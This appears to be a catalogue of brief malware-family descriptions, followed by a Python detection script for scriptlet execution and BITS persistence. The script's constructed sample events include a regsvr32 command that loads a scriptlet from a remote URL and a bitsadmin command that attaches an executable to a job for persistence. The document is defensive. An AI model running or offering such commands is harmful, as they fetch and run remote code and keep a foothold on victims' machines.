A remote access trojan based on the leaked source code of the Ammyy Admin version 3 that provides threat actors with full control over their victims' systems.
A trojan that harvests and exfiltrates data from the compromised system. It is installed on the system by a first-stage malware component.
A trojan that creates a VBScript file containing the path to an executable. Once a connection is established, the trojan can run three commands on the infected system: run a command, upload a file, and download a specified file.
A remote access trojan that persists on affected computers with full system access. It can spawn new remote desktop sessions, take screen captures and assemble them into a live stream of the affected desktop, start and kill processes on the target system, and can search, download, upload, and execute files.
A backdoor that uses raw sockets to create a reverse shell with full network encryption and integrity checks.
The opening ceremony of the 2018 Winter Olympics in Pyeongchang, South Korea, was disrupted by the Olympic Destroyer trojan, malware designed to destroy data. The attack caused Wi-Fi outages, disrupted television and internet services, and knocked the main press center offline.
A remote access trojan that uses cloud apps to deliver malicious Windows Script Component scriptlet files carrying a .sct extension.
A remote access trojan that can log user keystrokes, copy the clipboard, delete files, compress files, clear event logs, shut down the machine, and more.
A Korean-language trojan used for reconnaissance that collects detailed information about the victim's system, including the contents of the user's hard drive.
A Korean-language trojan first observed in mid-December 2017 that gathers detailed logs about the victim's configuration, hard drive contents, registry, scheduled tasks, running processes, and more.
A data-gathering trojan used as a first-stage reconnaissance tool and downloader for additional malicious payloads.
A remote access trojan built from original code, used by a single threat actor, and deployed against Ukrainian users.
An open-source .NET Framework remote access trojan family used in cyber-criminal and cyber-espionage campaigns against Windows devices.
An information-stealing trojan sold on criminal forums for 1,500 rubles (about $27) and distributed in the wild. It can steal browser cookies and stored credentials, and it monitors the Windows clipboard for certain text, replacing that text when a match is found.
A small application used to download other malware onto victim machines; it is often distributed via spam campaigns and exploit kits.
A malware variant designed to wipe data from hard drives, used by the Sandworm cyber-espionage group.
A remote access trojan (RAT) and infostealer built on the open-source LaZagne credential-recovery tool. It tracks mouse movements and clicks, logs keystrokes, records the webcam and screen, and recovers credentials stored on the system. It is sold on a Tor site.
A trojan used to target Wincor Nixdorf ATMs and empty the machines of all their banknotes.
ATM trojan malware used against a Brazilian bank's ATMs to steal customers' bank card numbers and account security codes.
A remote access trojan (RAT) that targets personnel and organizations connected to South Korea or the video game industry. It distributes malware through Google Drive, retrieves its C2 address from GitHub, and uses the Microsoft Windows Background Intelligent Transfer Service (BITS) to maintain persistence.
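Two of the entries above describe techniques that leave recognisable traces in process-creation telemetry: delivery of Windows Script Component (.sct) scriptlets, and persistence through BITS. The following detection logic is an added example, not code from this page or from any of the malware families it describes. It assumes the usual mechanisms behind those techniques, which the entries themselves do not spell out: .sct scriptlets are commonly executed by regsvr32.exe loading scrobj.dll with a remote /i: argument, and BITS persistence is commonly set up by attaching a notification command line to a job (bitsadmin /SetNotifyCmdLine or Set-BitsTransfer -NotifyCmdLine). The event records are constructed samples, loosely shaped like Sysmon Event ID 1 fields, not real telemetry.

```python
import re
from dataclasses import dataclass

# Constructed sample process-creation events (image path + command line).
# These are illustrative records only, not captured telemetry.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32.exe /s /n /u /i:https://drive.google.com/uc?id=abc123 scrobj.dll"},
    {"image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32.exe /s C:\Program Files\Vendor\control.ocx"},
    {"image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /create updater"},
    {"image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /SetNotifyCmdLine updater C:\Users\Public\svc.exe NULL"},
    {"image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer wsus https://update.example.org/kb.cab C:\Temp\kb.cab"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell -c "Get-Process"'},
]

# Each rule: (name, regex the image file name must match, regex the command line must match).
RULES = [
    # Assumption: .sct scriptlets run through regsvr32 + scrobj.dll, typically with a remote /i: URL.
    ("sct_scriptlet_exec",
     re.compile(r"^regsvr32\.exe$", re.I),
     re.compile(r"(/i:https?://|scrobj\.dll|\.sct\b)", re.I)),
    # Assumption: BITS persistence hooks a job's notification command line.
    ("bits_notify_cmdline",
     re.compile(r"^(bitsadmin|powershell|pwsh)\.exe$", re.I),
     re.compile(r"(/SetNotifyCmdLine|-NotifyCmdLine)", re.I)),
]


@dataclass(frozen=True)
class Finding:
    rule: str
    image: str
    cmdline: str


def image_name(path):
    """Return the file name portion of a Windows image path."""
    return path.rsplit("\\", 1)[-1]


def detect(events):
    """Apply RULES to each event; return one Finding per matching event (first rule wins)."""
    findings = []
    for ev in events:
        name = image_name(ev["image"])
        for rule, image_re, cmd_re in RULES:
            if image_re.search(name) and cmd_re.search(ev["cmdline"]):
                findings.append(Finding(rule, name, ev["cmdline"]))
                break
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"{f.rule:22} {f.image:16} {f.cmdline}")
```

Run against the constructed sample, the script reports exactly two events: the regsvr32 invocation that loads scrobj.dll from a cloud URL, and the bitsadmin call that attaches a notification command to a job. The benign regsvr32 registration, the plain /create and /transfer BITS commands, and the unrelated PowerShell call produce no findings, which is the point of anchoring each rule on both the image name and a specific argument rather than on the tool name alone.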